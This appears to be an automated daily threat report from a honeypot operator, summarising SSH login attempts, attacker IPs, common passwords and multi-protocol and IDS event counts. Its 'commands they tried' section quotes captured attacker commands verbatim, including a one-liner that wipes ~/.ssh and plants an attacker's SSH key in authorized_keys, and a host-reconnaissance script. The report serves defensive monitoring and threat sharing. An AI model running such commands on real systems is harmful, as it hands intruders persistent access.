Saturday, 16 May 2026 πŸ’€ critical

Daily Threat Report

1,085 SSH Connections
1,051 Login Attempts
228 Commands Run
65 SSH Unique IPs
18,321 Protocol Events
22 Protocol IPs

Top Attacker IPs

  1. 🌐 176.65.132.129 BGPβ†—
  2. 🌐 27.79.6.2 BGPβ†—
  3. 🌐 171.243.149.171 BGPβ†—
  4. 🌐 193.32.162.145 BGPβ†—
  5. 🌐 87.251.64.176 BGPβ†—

Top Passwords Tried

  1. 123456
  2. admin
  3. 123
  4. 1234
  5. password
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
β†’ 21 IPs β†’ AbuseIPDB  (community confidence scores updated)
β†’ 21 IPs β†’ AlienVault OTX  (pulse indicators added)
β†’ 21 IPs β†’ Blocklist.de  (auto-ban list updated)
β†’ 21 IPs β†’ DShield/SANS  (global threat feed updated)

🀣 ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

πŸ”‘ Hall of Shame β€” Passwords

admin
password
solana
abc123
1qaz@WSX

πŸ’» Commands They Tried

/bin/./uname -s -v -n -r -m
cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c ^processor /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E model name|Hardware /proc/cpuinfo | cut -d: -f2- | sed s/^ *//;s/ *$// ; lscpu 2>/dev/null | awk -F: /Model name/ {gsub(/^ +| +$/,,$2); print $2; exit} ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk NF{print; exit} ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr \n ) || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr \n ) || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo UNAME:$uname; echo ARCH:$arch; echo UPTIME:$uptime; echo CPUS:$cpus; echo CPU_MODEL:$cpu_model; echo GPU:$gpu_info; echo CAT_HELP:$cat_help; echo LS_HELP:$ls_help; echo LAST:$last_output
uname -a
uname -m 2 > /dev/null

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 16 de May de 2026. Recorded 1085 SSH connections on the Cowrie honeypot and 18321 multi-protocol events on OpenCanary, from 87 unique IPs. 21 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (Cowrie)

The SSH honeypot received 1051 login attempts from 65 unique IPs. Attackers executed 228 commands after gaining simulated system access.

Multi-Protocol Activity (OpenCanary)

Detected 18321 events across services including FTP, Telnet, MySQL, Redis, VNC and Git from 22 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 0 HTTP requests from real scanners across 0 unique IPs. Each attacker received a fake response generated in real time by the local AI model qwen2.5:0.5b (Ollama, no internet connection required).

Network IDS (Suricata)

The network intrusion detection system generated 18740 alerts from 394 unique source IPs. Suricata monitors all traffic on the primary network interface using Emerging Threats + AlienVault OTX rulesets.

← All Reports πŸ›‘οΈ Subscribe to blocklists β†’